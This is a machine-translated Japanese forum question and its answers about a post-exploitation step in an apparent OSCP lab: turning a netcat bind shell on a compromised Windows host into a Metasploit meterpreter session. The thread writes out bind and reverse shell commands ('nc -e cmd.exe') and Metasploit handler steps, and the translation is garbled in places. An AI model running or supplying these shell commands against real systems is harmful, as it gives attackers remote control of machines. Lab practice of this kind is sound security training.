私は何時間も努力してきましたが、簡単なことをすることに失敗しました!
私は管理者付きの箱を持っています(OSCPを取得-何も違法ではありません)。私はRDPエクスプロイトを使用し、シェルを取得し、ユーザーを追加し、ユーザーを管理者グループに入れました。座っているときは、現在、管理者と一緒にrdesktopにいます。
与えられた-ターゲット-192.168.1.200、私は管理シェルとrdesktopへのアクセス権を持っています。 nc.exeをアップロードした
KALI-私のマシン-192.168.1.100。
私がやろうとしていることは、TARGETのLISTENINGポートを開くことです... c:\ nc -lvp 9999 -e c:\ windows\system32\cmd.exe
... metasploitフレームワークを使用しているときに、KALIボックスから開いているポートに接続します。 nc 192.168.1.200 9999を使用して接続できますが、その接続をmetasploitセッションにすることはできません。
次に、post/multi/manage/Shell_to_meterpreterを使用して、この接続をmeterpreterセッションに変えます
ありがとう!
わかった!!!
https://www.youtube.com/watch?v=LRS05gvcvdk
TARGETリスナーをポート4444に設定する必要がありました。次にmulti/handlerを実行し、次にwindows/Shell_bind_tcpをペイロードします。
エクスプロイトと私はシェルを取得します。 Ctrl-Zでセッションをバックグラウンドにし、次のコマンドを実行します:post/multi/manage/Shell_to_meterpreter
セッションで、bamが実行しました!
schroederは厳密であり、nc -v 192.168.1.100 4040
(IPとポートを配置)を使用してクライアントから接続するか、msfconsoleからwindows/Shell/bind_tcp payload
を使用して、セッションをmeterpreterにアップグレードします。 explotationシェルをMeterpreterに送信
2番目のヒントは、nc -nvl 9090 -e cmd.exe
だけではサーバーからリバース接続を取得できないと思います(このコマンドは、ポート9090を開き、すべての入力、出力をcmdインスタンスとその「バインドサーバー」にリダイレクトします。 "-l option is to listen
、ncでリバースサーバーを生成するには、nc -v 10.10.1.10 4040 -e cmd.exe
を実行し、マシンをリスナーとして実行する必要があります)